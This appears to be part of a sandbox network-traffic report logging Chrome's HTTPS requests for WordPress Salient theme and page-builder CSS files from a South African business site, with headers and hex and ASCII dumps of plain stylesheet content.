                                                                                                                      2024-12-03 07:55:19 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:33 GMT
                                                                                                                      ETag: "d84e-5eed4eef40440"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 55374
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:19 UTC7909INData Raw: 70 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 2e 35 65 6d 7d 2e 6d 61 74 65 72 69 61 6c 20 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 2c 2e 6d 61 74 65 72 69 61 6c 20 2e 77 70 62 5f 72 6f 77 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 6c 61 72 67 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 6c 61 72 67 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 2e 35 72 65 6d 7d 2e 6d 61 74 65 72 69 61 6c 20 2e 76 63 5f 72 6f 77 2d 66 6c 75 69 64 5b 64 61 74 61 2d 63 6f 6c 75 6d 6e 2d 6d 61 72 67 69 6e 3d 6e 6f 6e 65 5d 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 23 68 65 61 64 65 72 2d 73 70 61 63 65 7b 62 61 63 6b 67 72
                                                                                                                      Data Ascii: p{padding-bottom:1.5em}.material .wpb_content_element,.material .wpb_row{margin-bottom:1.5em}.wp-block-quote.is-large,.wp-block-quote.is-style-large{margin-bottom:1.5rem}.material .vc_row-fluid[data-column-margin=none]{margin-bottom:0}#header-space{backgr
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 3a 31 7d 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 63 61 72 74 2d 6d 65 6e 75 20 2e 63 61 72 74 2d 69 63 6f 6e 2d 77 72 61 70 20 2e 69 63 6f 6e 2d 73 61 6c 69 65 6e 74 2d 63 61 72 74 2c 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 23 74 6f 70 20 6e 61 76 20 75 6c 20 23 73 65 61 72 63 68 2d 62 74 6e 20 61 20 73 70 61 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 23 74 6f 70 20 6e 61 76 20 75 6c 20 23 6e 65 63 74 61 72 2d 75 73 65 72 2d 61 63 63 6f 75 6e 74 20 61 20 73 70 61 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 36 70 78 7d 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 23 68 65 61 64 65 72 2d 6f
                                                                                                                      Data Ascii: :1}body.material #header-outer .cart-menu .cart-icon-wrap .icon-salient-cart,body.material #top nav ul #search-btn a span{font-size:20px}body.material #top nav ul #nectar-user-account a span{font-size:20px;width:26px;max-width:26px}body.material #header-o
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 32 5b 64 61 74 61 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 2d 6f 76 65 72 72 69 64 65 3d 22 23 66 66 66 66 66 66 22 5d 3a 68 6f 76 65 72 20 69 2c 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 5b 64 61 74 61 2d 62 75 74 74 6f 6e 2d 73 74 79 6c 65 5e 3d 72 6f 75 6e 64 65 64 5d 20 2e 6e 65 63 74 61 72 2d 62 75 74 74 6f 6e 2e 73 65 65 2d 74 68 72 6f 75 67 68 2d 33 5b 64 61 74 61 2d 68 6f 76 65 72 2d 63 6f 6c 6f 72 2d 6f 76 65 72 72 69 64 65 3d 22 23 66 66 66 66 66 66 22 5d 3a 68 6f 76 65 72 20 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 30 37 29 21 69 6d 70 6f 72 74 61 6e 74 7d 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 2e 6e 65 63 74 61 72 2d 62
                                                                                                                      Data Ascii: nectar-button.see-through-2[data-hover-color-override="#ffffff"]:hover i,body.material[data-button-style^=rounded] .nectar-button.see-through-3[data-hover-color-override="#ffffff"]:hover i{background-color:rgba(0,0,0,.07)!important}body.material .nectar-b
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 35 70 78 20 30 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 63 6c 61 73 73 2a 3d 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 5d 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 6d 65 6e 75 3e 6c 69 3e 73 6d 61 6c 6c 7b 6d 61 72 67 69 6e 3a 35 70 78 20 30 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 69 6e 6e 65 72 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2e 6d 6f 62 69 6c 65 2d 6f 6e 6c 79 20 2e 6d 65 6e 75 2e 73 65 63 6f 6e 64 61 72 79 2d 68 65 61 64 65 72 2d 69 74 65 6d 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69
                                                                                                                      Data Ascii: play:block;margin:5px 0}#slide-out-widget-area[class*=slide-out-from-right] .off-canvas-menu-container .menu>li>small{margin:5px 0}#slide-out-widget-area .inner .off-canvas-menu-container.mobile-only .menu.secondary-header-items{display:none}#slide-out-wi
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 2e 6d 61 74 65 72 69 61 6c 20 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 2e 70 69 6e 67 62 61 63 6b 3e 64 69 76 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 38 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 30 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 65 6d 7d 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 2e 63 6f 6d 6d 65 6e 74 3e 64 69 76 20 69 6d 67 2e 61 76 61 74 61 72 2c 62 6f 64 79 2e 6d 61 74 65 72 69 61 6c 20 2e 63 6f 6d 6d 65 6e 74 2d 6c 69 73 74 20 2e 70 69 6e 67 62 61 63 6b 3e 64 69 76 20 69 6d 67 2e 61 76 61 74 61 72 7b 6c 65 66
                                                                                                                      Data Ascii: .material .comment-list .pingback>div{background-color:transparent;box-shadow:none;padding-left:85px;padding-bottom:0;padding-top:0;margin-top:4em}body.material .comment-list .comment>div img.avatar,body.material .comment-list .pingback>div img.avatar{lef
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73 65 6c 65 63 74 32 2d 73 65 6c 65 63 74 69 6f 6e 2d 2d 73 69 6e 67 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 2e 31 29 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 35 35 2c 32 35 35 2c 32 35 35 2c 30 29 3b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 73 70 61 6e 5f 31 32 2e 6c 69 67 68 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 64 61 74 65 5d 3a 66 6f 63 75 73 2c 2e 73 70 61 6e 5f 31 32 2e 6c 69 67 68 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 65 6d 61 69 6c 5d 3a 66 6f 63 75 73 2c 2e 73 70 61 6e 5f 31 32 2e 6c 69 67 68 74 20 69 6e 70 75 74 5b 74 79 70 65 3d 70 61 73 73 77 6f 72 64 5d 3a 66 6f 63 75 73 2c 2e 73 70 61 6e 5f 31 32
                                                                                                                      Data Ascii: container--default .select2-selection--single{background-color:rgba(255,255,255,.1);border-color:rgba(255,255,255,0);color:#fff}.span_12.light input[type=date]:focus,.span_12.light input[type=email]:focus,.span_12.light input[type=password]:focus,.span_12
                                                                                                                      2024-12-03 07:55:19 UTC7465INData Raw: 66 72 6f 6d 2d 72 69 67 68 74 5d 20 2e 62 6f 74 74 6f 6d 2d 6d 65 74 61 2d 77 72 61 70 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 63 6c 61 73 73 2a 3d 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 5d 20 2e 6d 65 6e 75 77 72 61 70 70 65 72 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 63 6c 61 73 73 2a 3d 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 5d 20 2e 6f 66 66 2d 63 61 6e 76 61 73 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 5b 63 6c 61 73 73 2a 3d 73 6c 69 64 65 2d 6f 75 74 2d 66 72 6f 6d 2d 72 69 67 68 74 5d 20 2e 77 69 64 67 65 74 2e 77 69 64 67 65 74 5f 6e 61 76 5f 6d 65 6e 75 3e 64 69 76 7b 64
                                                                                                                      Data Ascii: from-right] .bottom-meta-wrap,#slide-out-widget-area[class*=slide-out-from-right] .menuwrapper,#slide-out-widget-area[class*=slide-out-from-right] .off-canvas-menu-container,#slide-out-widget-area[class*=slide-out-from-right] .widget.widget_nav_menu>div{d


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      94192.168.2.449856196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC588OUTGET /wp-content/uploads/salient/menu-dynamic.css?ver=26058 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:19 UTC281INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Mon, 06 Mar 2023 11:36:50 GMT
                                                                                                                      ETag: "e0e-5f639b5f73880"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 3598
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:19 UTC3598INData Raw: 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 6e 65 63 74 61 72 2d 65 78 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 2e 69 6d 61 67 65 2d 6c 61 79 65 72 2d 6f 75 74 65 72 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 6e 65 63 74 61 72 2d 65 78 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 2e 69 6d 61 67 65 2d 6c 61 79 65 72 2c 23 68 65 61 64 65 72 2d 6f 75 74 65 72 20 2e 6e 65 63 74 61 72 2d 65 78 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 2e 63 6f 6c 6f 72 2d 6f 76 65 72 6c 61 79 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 6e 65 63 74 61 72 2d 65 78 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 2e 69 6d 61 67 65 2d 6c 61 79 65 72 2d 6f 75 74 65 72 2c 23 73 6c 69 64 65 2d 6f 75 74 2d 77 69 64 67 65 74 2d 61 72 65 61 20 2e 6e 65 63 74 61 72 2d 65 78 74 2d 6d
                                                                                                                      Data Ascii: #header-outer .nectar-ext-menu-item .image-layer-outer,#header-outer .nectar-ext-menu-item .image-layer,#header-outer .nectar-ext-menu-item .color-overlay,#slide-out-widget-area .nectar-ext-menu-item .image-layer-outer,#slide-out-widget-area .nectar-ext-m


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      95192.168.2.449857196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:18 UTC614OUTGET /wp-content/plugins/js_composer_salient/assets/css/js_composer.min.css?ver=6.9.1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:19 UTC283INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:28:16 GMT
                                                                                                                      ETag: "9b3a-5eed4f517ac00"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 39738
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:19 UTC7909INData Raw: 0a 0a 2e 76 63 5f 70 61 72 61 6c 6c 61 78 2d 69 6e 6e 65 72 20 69 66 72 61 6d 65 2c 0a 2e 76 63 5f 76 69 64 65 6f 2d 62 67 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 30 25 0a 7d 0a 0a 2e 76 63 5f 63 6c 65 61 72 66 69 78 3a 61 66 74 65 72 2c 0a 2e 76 63 5f 63 6f 6c 75 6d 6e 2d 69 6e 6e 65 72 3a 3a 61 66 74 65 72 2c 0a 2e 76 63 5f 65 6c 2d 63 6c 65 61 72 66 69 78 2c 0a 2e 76 63 5f 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 63 6c 65 61 72 3a 20 62 6f 74 68 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 3a 62 65 66 6f 72 65 2c 0a 2e 63 6f 6e 74 61 69 6e 65 72 3a 61 66 74 65 72 2c 0a 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 3a 62 65 66 6f 72 65 2c 0a 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 3a 61 66 74 65
                                                                                                                      Data Ascii: .vc_parallax-inner iframe,.vc_video-bg iframe { max-width: 1000%}.vc_clearfix:after,.vc_column-inner::after,.vc_el-clearfix,.vc_row:after { clear: both}.container:before,.container:after,.container-fluid:before,.container-fluid:afte
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 20 20 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 31 65 22 0a 7d 0a 2e 76 63 2d 63 2d 69 63 6f 6e 2d 74 65 78 74 2d 62 6c 6f 63 6b 3a 62 65 66 6f 72 65 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 22 5c 65 39 31 66 22 0a 7d 0a 0a 2e 76 63 5f 74 78 74 5f 61 6c 69 67 6e 5f 6c 65 66 74 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 0a 7d 0a 0a 2e 76 63 5f 74 78 74 5f 61 6c 69 67 6e 5f 72 69 67 68 74 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 72 69 67 68 74 0a 7d 0a 0a 2e 76 63 5f 74 78 74 5f 61 6c 69 67 6e 5f 63 65 6e 74 65 72 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 0a 7d 0a 0a 2e 76 63 5f 74 78 74 5f 61 6c 69 67 6e 5f 6a 75 73 74 69 66 79 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6a
                                                                                                                      Data Ascii: content:"\e91e"}.vc-c-icon-text-block:before{ content:"\e91f"}.vc_txt_align_left { text-align: left}.vc_txt_align_right { text-align: right}.vc_txt_align_center { text-align: center}.vc_txt_align_justify { text-align: j
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 64 69 76 3e 64 69 76 2e 77 70 62 5f 77 72 61 70 70 65 72 20 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0a 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 77 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 77 72 61 70 70 65 72 20 2e 77 70 62 5f 61 63 63 6f 72 64 69 6f 6e 5f 63 6f 6e 74 65 6e 74 3e 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 3a 6c 61 73 74 2d 63 68 69 6c 64 2c 0a 2e 77 70 62 5f 63 6f 6e 74 65 6e 74 5f 65 6c 65 6d 65 6e 74 20 2e 77 70 62 5f 74 6f 75 72 5f 74 61 62 73 5f 77 72 61 70 70 65 72 20 2e 77 70 62 5f 74 61 62 20 2e 77 70 62 5f 72 6f 77 3a 6c 61 73 74 2d 63 68 69 6c 64 3e 64 69 76 3e 64 69 76 2e 77 70 62 5f 77 72 61 70 70 65 72 20 2e 77 70 62 5f 63 6f 6e 74
                                                                                                                      Data Ascii: div>div.wpb_wrapper .wpb_content_element:last-child,.wpb_content_element .wpb_accordion_wrapper .wpb_accordion_content>.wpb_content_element:last-child,.wpb_content_element .wpb_tour_tabs_wrapper .wpb_tab .wpb_row:last-child>div>div.wpb_wrapper .wpb_cont
                                                                                                                      2024-12-03 07:55:19 UTC8000INData Raw: 5f 30 31 5f 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 36 30 30 22 0a 7d 0a 0a 2e 76 63 5f 61 72 72 6f 77 2d 69 63 6f 6e 2d 61 72 72 6f 77 5f 30 31 5f 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 36 30 31 22 0a 7d 0a 0a 2e 76 63 5f 61 72 72 6f 77 2d 69 63 6f 6e 2d 61 72 72 6f 77 5f 30 32 5f 6c 65 66 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 36 30 32 22 0a 7d 0a 0a 2e 76 63 5f 61 72 72 6f 77 2d 69 63 6f 6e 2d 61 72 72 6f 77 5f 30 32 5f 72 69 67 68 74 3a 62 65 66 6f 72 65 20 7b 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 5c 65 36 30 33 22 0a 7d 0a 0a 2e 76 63 5f 61 72 72 6f 77 2d 69 63 6f 6e 2d 61 72 72 6f 77 5f 30 33 5f 6c
                                                                                                                      Data Ascii: _01_left:before { content: "\e600"}.vc_arrow-icon-arrow_01_right:before { content: "\e601"}.vc_arrow-icon-arrow_02_left:before { content: "\e602"}.vc_arrow-icon-arrow_02_right:before { content: "\e603"}.vc_arrow-icon-arrow_03_l
                                                                                                                      2024-12-03 07:55:19 UTC7829INData Raw: 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 30 2c 20 30 29 3b 0a 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 20 20 20 20 66 69 6c 74 65 72 3a 20 61 6c 70 68 61 28 6f 70 61 63 69 74 79 3d 31 30 30 29 0a 20 20 20 20 7d 0a 7d 0a 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 77 70 62 5f 61 70 70 65 61 72 20 7b 0a 20 20 20 20 30 25 20
                                                                                                                      Data Ascii: -webkit-transform: translate(0, 0); -ms-transform: translate(0, 0); -o-transform: translate(0, 0); transform: translate(0, 0); opacity: 1; filter: alpha(opacity=100) }}@-webkit-keyframes wpb_appear { 0%


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      96192.168.2.449858196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:19 UTC601OUTGET /wp-content/themes/salient/css/salient-dynamic-styles.css?ver=53858 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://www.itnaledi.co.za/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:19 UTC285INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:19 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:36:12 GMT
                                                                                                                      ETag: "2d893-5eed51176db00"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 186515
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: text/css
                                                                                                                      2024-12-03 07:55:19 UTC7907INData Raw: 2e 6e 65 63 74 61 72 2d 63 6f 6c 6f 72 2d 61 63 63 65 6e 74 2d 63 6f 6c 6f 72 2c 62 6f 64 79 20 61 2c 6c 61 62 65 6c 20 73 70 61 6e 2c 62 6f 64 79 20 5b 63 6c 61 73 73 5e 3d 22 69 63 6f 6e 2d 22 5d 2e 69 63 6f 6e 2d 64 65 66 61 75 6c 74 2d 73 74 79 6c 65 2c 2e 62 6c 6f 67 2d 72 65 63 65 6e 74 5b 64 61 74 61 2d 73 74 79 6c 65 2a 3d 22 63 6c 61 73 73 69 63 5f 65 6e 68 61 6e 63 65 64 22 5d 20 2e 70 6f 73 74 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 69 2c 2e 6d 61 73 6f 6e 72 79 2e 63 6c 61 73 73 69 63 5f 65 6e 68 61 6e 63 65 64 20 2e 70 6f 73 74 20 2e 70 6f 73 74 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 69 2c 2e 70 6f 73 74 20 2e 70 6f 73 74 2d 68 65 61 64 65 72 20 68 32 20 61 2c 2e 70 6f 73 74 20 2e 70 6f 73 74 2d 68 65 61 64 65 72 20 61 3a 68 6f 76 65 72
                                                                                                                      Data Ascii: .nectar-color-accent-color,body a,label span,body [class^="icon-"].icon-default-style,.blog-recent[data-style*="classic_enhanced"] .post-meta a:hover i,.masonry.classic_enhanced .post .post-meta a:hover i,.post .post-header h2 a,.post .post-header a:hover
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 74 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 74 6f 75 63 68 5f 74 6f 74 61 6c 22 5d 5b 64 61 74 61 2d 63 6f 6e 74 72 6f 6c 2d 63 6f 6c 6f 72 3d 22 61 63 63 65 6e 74 2d 63 6f 6c 6f 72 22 5d 20 2e 76 69 73 75 61 6c 69 7a 65 64 2d 74 6f 74 61 6c 20 73 70 61 6e 2c 5b 63 6c 61 73 73 2a 3d 22 20 69 63 6f 6e 2d 22 5d 2c 2e 74 6f 67 67 6c 65 2e 6f 70 65 6e 20 3e 20 2e 74 6f 67 67 6c 65 2d 74 69 74 6c 65 20 61 2c 64 69 76 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 2e 6f 70 65 6e 20 3e 20 2e 74 6f 67 67 6c 65 2d 74 69 74 6c 65 20 69 3a 61 66 74 65 72 2c 64 69 76 5b 64 61 74 61 2d 73 74 79 6c 65 3d 22 6d 69 6e 69 6d 61 6c 22 5d 20 2e 74 6f 67 67 6c 65 3a 68 6f 76 65 72 20 3e 20 2e 74 6f 67 67 6c 65 2d 74 69 74 6c 65 20 69 3a
                                                                                                                      Data Ascii: ta-controls="touch_total"][data-control-color="accent-color"] .visualized-total span,[class*=" icon-"],.toggle.open > .toggle-title a,div[data-style="minimal"] .toggle.open > .toggle-title i:after,div[data-style="minimal"] .toggle:hover > .toggle-title i:
                                                                                                                      2024-12-03 07:55:20 UTC8000INData Raw: 6d 65 6d 62 65 72 5f 64 65 74 61 69 6c 73 20 2e 62 69 6f 2d 69 6e 6e 65 72 20 2e 6d 6f 62 69 6c 65 2d 63 6c 6f 73 65 3a 62 65 66 6f 72 65 2c 2e 6e 65 63 74 61 72 5f 74 65 61 6d 5f 6d 65 6d 62 65 72 5f 6f 76 65 72 6c 61 79 20 2e 74 65 61 6d 5f 6d 65 6d 62 65 72 5f 64 65 74 61 69 6c 73 20 2e 62 69 6f 2d 69 6e 6e 65 72 20 2e 6d 6f 62 69 6c 65 2d 63 6c 6f 73 65 3a 61 66 74 65 72 2c 2e 66 61 6e 63 79 62 6f 78 2d 6e 61 76 69 67 61 74 69 6f 6e 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 3a 62 65 66 6f 72 65 2c 62 75 74 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 68 6f 76 65 72 2c 62 75 74 74 6f 6e 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 66 6f 63 75 73 2c 62 6f 64 79 5b 64 61 74 61 2d 66 6f 72 6d 2d 73 75 62 6d 69 74 3d 22 73 65 65 2d 74 68 72 6f 75 67 68 22
